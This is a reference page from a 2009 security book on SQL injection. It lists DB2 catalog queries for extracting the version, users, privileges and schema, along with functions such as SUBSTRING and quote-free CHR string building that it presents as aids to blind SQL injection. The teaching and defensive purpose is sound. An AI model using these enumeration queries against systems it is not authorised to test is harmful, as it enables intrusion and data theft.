SQL Injection Attacks and Defense - 2009

450 Chapter 10 • References
Table 10.24 Extracting DB2 Database Configuration Information
Data
Version
Current user
List users
Current user privileges
Query
SELECT versionnumber, version_timestamp FROM
sysibm.sysversions;
SELECT user FROM sysibm.sysdummy1;
SELECT session_user FROM sysibm.sysdummy1;
SELECT system_user FROM sysibm.sysdummy1;
SELECT grantee FROM syscat.dbauth;
SELECT * FROM syscat.dbauth WHERE grantee =user;
SELECT * FROM syscat.tabauth WHERE grantee =user;
SELECT * FROM syscat.tabauth;
Table 10.25 Extracting DB2 Database Schema
Data
Current database
List databases
List tables
List columns
Query
SELECT current server FROM sysibm.sysdummy1;
SELECT schemaname FROM syscat.schemata;
SELECT name FROM sysibm.systables;
SELECT name, tbname, coltype FROM sysibm.syscolumns;
Blind SQL Injection Functions: DB2
Table 10.26 lists functions that are useful when performing blind SQL injection attacks.
Table 10.26 Blind SQL Injection Functions
Data
String length
Extract substring from a
given string
String (‘ABC’) representation
with no single quotes
Query
LENGTH()
SUBSTRING(string,offset,length) FROM
sysibm.sysdummy1;
SELECT CHR(65)||CHR(66)||CHR(67);